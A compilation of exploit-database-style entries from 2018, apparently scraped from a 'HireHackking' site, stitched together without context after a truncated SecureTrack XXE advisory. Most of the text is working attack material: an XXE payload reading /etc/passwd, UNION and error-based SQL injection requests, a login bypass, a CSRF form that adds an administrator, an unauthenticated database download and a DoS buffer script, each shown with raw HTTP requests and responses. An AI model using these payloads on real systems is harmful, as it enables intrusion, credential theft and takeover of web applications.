# The issue was identified inside the "Audit" > "Best Practices" module of the "SecureTrack" 
# application when creating a new Best Practices query and manipulating the "xml" parameter 
# in the request. When the vulnerability is triggered it doesn't directly return anything 
# to the attacker but rather the contents of the requested file are written inside 
# the name field of a best practices. This vulnerability affects every "SecureTrack" 
# application authentication user role.
   
# 2. Proof of Concept
# Step 1: Login to the "SecureTrack" application using any user and then navigate to 
# "Audit" > "Best Practices". 
# Step 2: Create and submit a "New Query" while intercepting the traffic:
# Step 3: Send the request to repeater and change it to include the following 
# payload after the "xml=" input field:
-->

<!DOCTYPE foo [<!ENTITY AAAA SYSTEM "file:///etc/passwd"> ]>

<!--

# The payload should be URL encoded before delivered to the application

# Step 4: Submit the request to the server.

# Step 5: Refresh your browser to view the new Best Practice that was created. The following image 
# displays that the request was successfully processed by the server and a new Best Practice was 
# created. The contents of the requested file "/etc/passwd" is saved as the name of the "Best Practice query". 

# 3. Solution:
# Reconfigure the XML processor to use a local static DTD and disallow any declared DTD included in 
# the XML document. Another solution is to explicitly disable External XML Entities in the parser of 
# the application.
HireHackking 
# Exploit Title: The Don 1.0.1 - 'login' SQL Injection
# Dork: N/A
# Date: 2018-11-11
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://thedon.sourceforge.io/
# Software Link: https://netix.dl.sourceforge.net/project/thedon/thedon-1.0b.rar
# Version: 1.0.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/index.php
# 
POST /[PATH]/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 596
login=%2d%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2c%33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%33%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2c%34%32%2c%34%33%2c%34%34%2c%34%35%2c%34%36%2c%34%37%2c%34%38%2c%34%39%2c%35%30%2c%35%31%2c%35%32%2c%35%33%2c%35%34%2c%35%35%2c%35%36%2c%35%37%2c%35%38%2c%35%39%2c%36%30%2d%2d%20%2d&pass=&submit=Efe
HTTP/1.1 200 OK
Date: Sat, 10 Nov 2018 21:29:43 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3237
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

# POC: 
# 2)
# http://localhost/[PATH]/parolapierduta.php
# 
POST /[PATH]/parolapierduta.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 590
email=%2d%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2c%33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%33%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2c%34%32%2c%34%33%2c%34%34%2c%34%35%2c%34%36%2c%34%37%2c%34%38%2c%34%39%2c%35%30%2c%35%31%2c%35%32%2c%35%33%2c%35%34%2c%35%35%2c%35%36%2c%35%37%2c%35%38%2c%35%39%2c%36%30%2d%2d%20%2d&submit=Efe
HTTP/1.1 200 OK
Date: Sat, 10 Nov 2018 21:31:02 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3110
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
HireHackking 
# Exploit Title: Easyndexer 1.0 - Cross-Site Request Forgery (Add Admin)
# Dork: N/A
# Date: 2018-11-10
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://sourceforge.net/projects/easyndexer/
# Software Link: https://ayera.dl.sourceforge.net/project/easyndexer/easyndexer_win32.exe
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/src/createuser.php
# 
POST /[PATH]/src/createuser.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
username=efe&password=efe&name=OMer&surname=Efe&privileges=1
HTTP/1.1 200 OK
Date: Sat, 10 Nov 2018 17:12:54 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=fuiv6a0p3jnu15ggcphj624e74; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 127
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

# POC: 
# 2)
# http://localhost/[PATH]/src/createuser.php
# 
<html>
<body>
<tr>
	<form action="http://localhost/ExploitDb/easyndexer/src/createuser.php" method="POST">
		<td>New:</td>
		<td><input name="username" type="text"></td>
		<td><input name="password" type="text"></td>
		<td><input name="name" type="text"></td>
		<td><input name="surname" type="text"></td>
		<td><select name="privileges">
			<option value="1">Administrator</option>
			<option value="2">Manager</option>
			<option value="3">User</option>
			<option value="4">Guest</option>
			<option value="5">Translator</option>
		</select></td>
		<td><input value="Create" title="Creates a new user" type="submit"></td>
		<td><input value="Reset" title="Reset data" type="reset"></td>
	</form>
</tr>
</body>
</html>

# POC: Database File Download
# 3)
# http://localhost/[PATH]/databases/generaldb.db
# 
GET /[PATH]/databases/generaldb.db HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fuiv6a0p3jnu15ggcphj624e74
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sat, 10 Nov 2018 17:15:04 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
Last-Modified: Sat, 10 Nov 2018 17:12:54 GMT
Etag: "1400-57a52941eade9"
Accept-Ranges: bytes
Content-Length: 5120
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
HireHackking 
# Exploit Title: CuteFTP 9.3.0.3 - Denial of Service (PoC)
# Date: 2018-11-05
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.globalscape.com/cuteftp
# Software Link: https://www.globalscape.com/cuteftp
# Version: 9.3.0.3
# Tested on: Windows 10 Home x64
# CVE : n/a

# STEPS
# Run the python exploit script, it will create a new .txt files
# Open the program CuteFTP
# Copy the content of the file "Cute.txt"
# Paste the content in the fields Host, Username and Password
# In the field "Hostname or IP" paste the content of the file "IP.txt"
# Click in Connect
# End :)

buffer = 'A' * 1000

try: 
    file = open("Cute.txt","w")
    file.write(buffer)
    file.close()

    print("Archive ready")
except:
    print("Archive no ready")
HireHackking 
# Exploit Title: GPS Tracking System 2.12 - 'username' SQL Injection
# Dork: N/A
# Date: 2018-11-10
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://sourceforge.net/projects/gpstracking/
# Software Link: https://kent.dl.sourceforge.net/project/gpstracking/gps.zip
# Version: 2.12
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/monitoring/login.php
# 
POST /[PATH]/monitoring/login.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/[PATH]/monitoring/login.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
username=%27or+1%3D1+or+%27%27%3D%27&password=&login=LOGIN
HTTP/1.1 302 Found
Date: Sat, 10 Nov 2018 11:45:59 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=v7mujh7lua6d21q575eoletdt7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: index.php
Content-Length: 4095
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
HireHackking 
# Exploit Title: Facturation System 1.0 - 'modid' SQL Injection
# Dork: N/A
# Date: 2018-11-08
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://obedalvarado.pw/simple-invoice/
# Software Link: https://kent.dl.sourceforge.net/project/simple-invoice/simple-invoice-master.zip
# Version: 1.0 
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/ajax/editar_producto.php
# 
POST /[PATH]/ajax/editar_producto.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=aehrspv1bfhbp1iqhkl1107vd7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 321
mod_codigo=d&mod_id=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&mod_nombre=ds&mod_estado=1&mod_precio=2.00
HTTP/1.1 200 OK
Date: Thu, 08 Nov 2018 20:33:55 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 308
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8